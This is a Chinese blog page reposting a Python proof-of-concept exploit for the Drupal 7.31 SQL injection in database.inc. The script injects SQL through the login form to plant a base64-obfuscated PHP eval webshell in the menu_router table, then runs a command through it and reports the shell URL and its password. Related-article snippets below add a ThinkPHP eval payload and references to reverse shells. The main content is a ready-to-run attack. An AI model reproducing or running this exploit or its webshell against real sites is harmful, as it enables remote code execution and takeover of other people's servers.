Drupal 7.31 GetShell via /includes/database/database.inc SQL Injection Exploit

最新推荐文章于 2024-04-18 20:44:41 发布
最新推荐文章于 2024-04-18 20:44:41 发布
阅读量2.1k 收藏
点赞数

http://www.beebeeto.com/pdb/poc-2014-0100/


#!/usr/bin/env python
# coding=utf-8

"""
Site: http://www.beebeeto.com/
Framework: https://github.com/ff0000team/Beebeeto-framework
"""

# 漏洞分析:https://www.ricter.me/posts/Drupal%20%E7%9A%84%20callback%20%E5%99%A9%E6%A2%A6

import urllib
import urllib2

from baseframe import BaseFrame


class MyPoc(BaseFrame):
    poc_info = {
        # poc相关信息
        'poc': {
            'id': 'poc-2014-0100',
            'name': 'Drupal 7.31 GetShell via /includes/database/database.inc SQL Injection Exploit',
            'author': 'Ricter',
            'create_date': '2014-10-21',
        },
        # 协议相关信息
        'protocol': {
            'name': 'http',
            'port': [80],
            'layer3_protocol': ['tcp'],
        },
        # 漏洞相关信息
        'vul': {
            'app_name': 'Drupal',
            'vul_version': ['<=7.31'],
            'type': 'Code Execution',
            'tag': ['Drupal漏洞', '代码执行漏洞', 'SQL注入漏洞', 'PHP', 'GETSHELL'],
            'desc': '''
                    Drupal 7.31 /includes/database/database.inc在处理IN语句时,展开数组时key带入SQL语句导致SQL注入,
                    可以添加管理员、造成信息泄露,利用特性也可 getshell。
                    ''',
            'references': ['https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html'],
        },
    }

    @classmethod
    def exploit(cls, args):
        url = args['options']['target']
        webshell_url = url + '/?q=<?php%20eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>'
        payload = "name[0;insert into menu_router (path,  page_callback, access_callback, " \
                  "include_file, load_functions, to_arg_functions, description) values ('<" \
                  "?php eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>','php_eval', '1', '" \
                  "modules/php/php.module', '', '', '');#]=test&name[0]=test2&pass=test&fo" \
                  "rm_id=user_login_block"

        if args['options']['verbose']:
            print '[*] Request URL: ' + url
            print '[*] POST Content: ' + payload

        urllib2.urlopen(url, data=payload)
        request = urllib2.Request(webshell_url, data="e=echo strrev(gwesdvjvncqwdijqiwdqwduhq);")
        response = urllib2.urlopen(request).read()

        if 'gwesdvjvncqwdijqiwdqwduhq'[::-1] in response:
            args['success'] = True
            args['poc_ret']['vul_url'] = url
            args['poc_ret']['Webshell'] = webshell_url
            args['poc_ret']['Webshell_PWD'] = 'e'
            return args
        args['success'] = False
        return args

    verify = exploit

if __name__ == '__main__':
    from pprint import pprint

    mp = MyPoc()
    pprint(mp.run())


cnbird2008
关注
Drupal 7.31SQL注入getshell漏洞利用详解及EXP
Coisini的博客
06-15 3940
0x00 这个漏洞威力确实很大,而且Drupal用的也比较多,使用Fuzzing跑字典应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以我也就只是写个Exp不再深入下去。 0x01 关于漏洞的原理和POC在我的博客上已经有文章进行解释,这里只是着重说一下利用过程。配合POC的效果,我主要是从远程代码执行和GetShell方面去做的利用。 远程代码执行利用: 1.使用超级管理...
Drupal 7.31最新SQL Injection漏洞利用脚本支撑库文件
10-23
Drupal 7.31最新SQL Injection漏洞利用脚本支撑库文件 具体利用方法可以参见http://blog.csdn.net/kikaylee/article/details/40400643
drupal cms后台shell
weixin_33711641的博客
05-28 1135
     
Drupal 7.31 SQL注入漏洞
小小猪的博客
11-15 1896
Drupal 7.31 SQL注入漏洞 漏洞详解: Drupal是一个开源内容管理平台,为数百万个网站和应用程序提供支持。 这个漏洞威力确实很大,而且Drupal用的也比较多,使用Fuzzing跑字典应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以也就只是写个Exp不再深入下去。 环境搭建: drupla 下载地址 环境打包在目录下安装即可 中间遇到的问题: 解决方法:关闭extersion=php_mbstring.dll(修改前注意备份原来的) xploit:.
Drupal实战》——1.2 访问Drupal后台
weixin_34013044的博客
08-01 505
1.2 访问Drupal后台 现在就可以访问我们的Drupal站点了,如图1-13所示。 如果你用过Drupal 6的话,那么会发现,Drupal 7的默认安装在用户界面方面改进了很多。当然,距离我们的最终目标还有十万八千里,我们现在仅仅是开了一个头。不过,这是一个好头。 我们不妨进来看看。网页的最上面是一个导航条,如图1-14所示。 单击这些链接,...
弃用:有关最新代码和问题,请参阅https://drupal.org/project/dropzonejs-DropzoneJS的D8集成。-PHP开发
05-27
关于DropzoneJS这是DropzoneJS的Drupal 8...有关更多信息,请参见http://drupal.org/node/1189632。 现在,您将可以使用dropzonejs元素。 ###未来计划:一个dropzonejs字段小部件。 处理已经上传的文件。 处理其他类型
blog5671_www.5671_www://http5671._校园网站_
09-30
2. **动态内容管理**:考虑到网站需要定期更新新闻,可能会使用CMS(内容管理系统),如WordPress或Drupal,这些系统允许非技术用户也能方便地添加、编辑和删除内容。 3. **数据库管理**:存储新闻文章和其他数据时...
浅析Java、C/C++、JavaScript、PHP、Python分别用来开发什么?
10-18
C/C++语言因其高效性和对硬件的控制能力,被认为是开发系统底层软件、嵌入式系统和游戏开发的首选。C语言在操作系统、驱动程序、算法实现等方面有着不可替代的作用。C++则因为其面向对象的特性和模板功能,更适合...
Drupal 7.31 SQL注入漏洞利用详解及EXP
热门推荐
Exploit的小站~
05-10 2万+
 有意迟几天放出来这篇文章以及程序,不过看样子Drupal的这个洞没有引起多少重视,所以我也没有必要按着不发了,不过说实话这个洞威力挺大的,当然,这也是Drupal本身没有意料到的。 0x00 首先,这个漏洞真的很大,而且Drupal用的也比较多,应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以我也就只是写个Exp。不过,这个洞好像不怎么被重视,这也是极为不合适。...
【废了-准备删除01】渗透测试靶机搭建——基于WAMP的drupal7.x管理系统
Fighting_hawk的博客
03-22 4564
1. 本节主要是为后续进行渗透测试实验准备好靶机平台。
Suid之find提权靶机渗透实战
PANDA墨森的博客
07-11 1531
这是vulnhub靶机系列文章的第十一篇,本次主要知识点为:drupal漏洞利用,suid提权之find命令 靶机下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13229881.html #001 实验环境 攻击机:kali :192.168.136.129 靶机:192.168.136.136 #002 寻找靶机ip Kali下使用netdisco..
DC: 1
箭雨镜屋
06-13 569
渗透思路:nmap扫描----利用Drupal 7的RCE(CVE-2018-7600)getshell----python反弹shell----非渗透路径:Drupal配置文件中找到数据库用户名密码----非渗透路径:数据库中找到flag3、/home/flag4下发现flag4----suid权限的find命令提权...
ThinkPHP及Drupal漏洞合集
小小猪的博客
08-19 758
ThinkPHP漏洞 ThinkPHP2.x远程代码执行漏洞 漏洞复现 使用payload 直接访问,即可执行phpinfo(): http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D 利用该漏洞getshell,下面给出一个能够直接蚁剑(菜刀)连接的payload: /index.php?s=a/b/c/${@print(eval($_POST[1]))} ThinkPHP3.2.3 SQL注入漏.
Vulnhub靶机——DC-1
最新发布
流水不争先,争的是滔滔不绝
04-18 893
Vulnhub靶机——DC-1,cms(Drupal 7)存在框架漏洞,msf利用框架漏洞拿到普通用户的shell,再通过SUID提权
Drupal 7.31版本最新漏洞利用个人完整总结,共享出来(附上利用源码)
What_Happened的博客
11-25 3286
2014年10月16日有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并给出了利用测试的EXP代码,小编在本地搭建Drupal7.31的环境,经过测试,发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。        通过测试,我总结了一套完整的利用过程。       (1)利用google查找潜在的目标,关键字很多啦,比如:in
Drupal CVE-2018-7600 漏洞利用和攻击
weixin_34199405的博客
04-26 3944
背景介绍 2018年3月28日,Drupal Security Team官方发布了一个重要的安全公告,宣称Drupal 6,7,8等多个子版本存在远程代码执行漏洞,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站,该漏洞就是:CVE-2018-7600。 此消息一出,蠢蠢欲动的黑客们立马如天降尚方宝剑,都在暗处磨刀霍...
Drupal 远程代码执行漏洞(CVE-2019-6339)
limb0的博客
07-04 9037
Drupal 远程代码执行漏洞(CVE-2019-6339) 一、漏洞介绍 Drupal core是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。 Drupal core 7.62之前的7.x版本、8.6.6之前的8.6.x版本和8.5.9之前的8.5.x版本中的内置phar stream wrapper(PHP)存在远程代码执行漏洞。远程攻击者可利用该漏洞执行任意的php代码。 二、漏洞危害 远程代码执行。 三、漏洞验证 环境搭建: 实验环境 系统 IP地址 攻击
Drupal远程命令执行漏洞复现
BerL1n
12-29 785
time: 2019-05-12 21:46 漏洞描述 Drupal官方发布了一个编号为CVE-2017- 6920 的漏洞,影响为Critical。这是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core。 漏洞检测 针对该漏洞,可采用两种方法进行检测: 方法一:登陆Drupal管理后台,查看内核版本是8.x,且版本号低于8.3.4,则存在该漏洞;否则,不存在该漏洞; 方法二:在Drupal根目录下找到文件/core/lib/Drupal/Com
精通Drupal 7.x开发:实战指南
"Drupal 7.x开发手册" Drupal是开源社区中的一个强大内容管理系统(CMS),专为构建功能丰富的网站而设计。"Drupal 7.x开发手册"是针对这个版本的详细指南,由专家Todd Tomlinson和John K. Van Dyk撰写。这本书...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值